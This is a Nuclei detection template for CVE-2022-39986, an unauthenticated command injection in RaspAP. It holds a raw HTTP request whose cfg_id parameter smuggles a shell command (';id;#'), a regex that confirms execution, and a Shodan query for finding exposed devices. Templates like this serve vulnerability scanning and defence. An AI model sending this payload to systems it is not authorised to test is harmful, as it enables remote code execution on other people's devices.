nuclei-templates/http/cves/2022/CVE-2022-39986.yaml

59 lines
2.2 KiB
YAML

id: CVE-2022-39986
info:
name: RaspAP 2.8.7 - Unauthenticated Command Injection
author: DhiyaneshDK
severity: critical
description: |
A Command injection vulnerability in RaspAP 2.8.0 thru 2.8.7 allows unauthenticated attackers to execute arbitrary commands via the cfg_id parameter in /ajax/openvpn/activate_ovpncfg.php and /ajax/openvpn/del_ovpncfg.php.
impact: |
Successful exploitation of this vulnerability can lead to remote code execution, compromising the confidentiality, integrity, and availability of the affected system.
remediation: |
Upgrade to a patched version of RaspAP or apply the vendor-supplied patch to mitigate this vulnerability.
reference:
- https://packetstormsecurity.com/files/174190/RaspAP-2.8.7-Unauthenticated-Command-Injection.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-39986
- https://medium.com/@ismael0x00/multiple-vulnerabilities-in-raspap-3c35e78809f2
- http://packetstormsecurity.com/files/174190/RaspAP-2.8.7-Unauthenticated-Command-Injection.html
- https://github.com/RaspAP/raspap-webgui/blob/master/ajax/openvpn/activate_ovpncfg.php
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-39986
cwe-id: CWE-77
epss-score: 0.8322
epss-percentile: 0.98189
cpe: cpe:2.3:a:raspap:raspap:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: raspap
product: raspap
shodan-query: http.favicon.hash:-1465760059
tags: cve,cve2022,packetstorm,raspap,rce
http:
- raw:
- |
POST /ajax/openvpn/del_ovpncfg.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
cfg_id=;id;#
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "uid=([0-9(a-z-)]+) gid=([0-9(a-z-)]+) groups=([0-9(a-z-)]+)"
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
# digest: 4a0a00473045022020cb5c133e03e9f49432f2a91d059461edb00fee56e5e2ec1cb033d4c91cb6f7022100a65cf38be0eed4e1ad0af73ba7ca1fd588a0e877d2b239eb60b7dbb5319befd1:922c64590222798bb761d5b6d8e72950